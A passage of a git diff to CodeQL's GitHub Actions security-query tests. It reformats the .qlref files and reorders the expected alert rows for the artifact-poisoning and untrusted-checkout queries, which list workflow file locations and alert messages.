artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref index 2f71173a891e..4f8d2af04e8d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-829/ArtifactPoisoningCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-829/ArtifactPoisoningCritical.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index ef09155ec63c..c0c52e47f5b3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,4 +1,3 @@ -#select edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | @@ -55,3 +54,4 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref index 177e1b08095a..39548f274127 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-829/ArtifactPoisoningMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-829/ArtifactPoisoningMedium.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref index 4f3bbb90c2a3..17a2059f7e99 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -1,2 +1,2 @@ -query: experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref index ce9ebe84e530..8c9db66bf6bb 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref @@ -1,2 +1 @@ -query: Security/CWE-829/UnpinnedActionsTag.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-829/UnpinnedActionsTag.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 6f478cfcb14c..52fcecfb9ed7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,43 +1,3 @@ -#select -| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | @@ -377,3 +337,43 @@ edges | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | +#select +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | 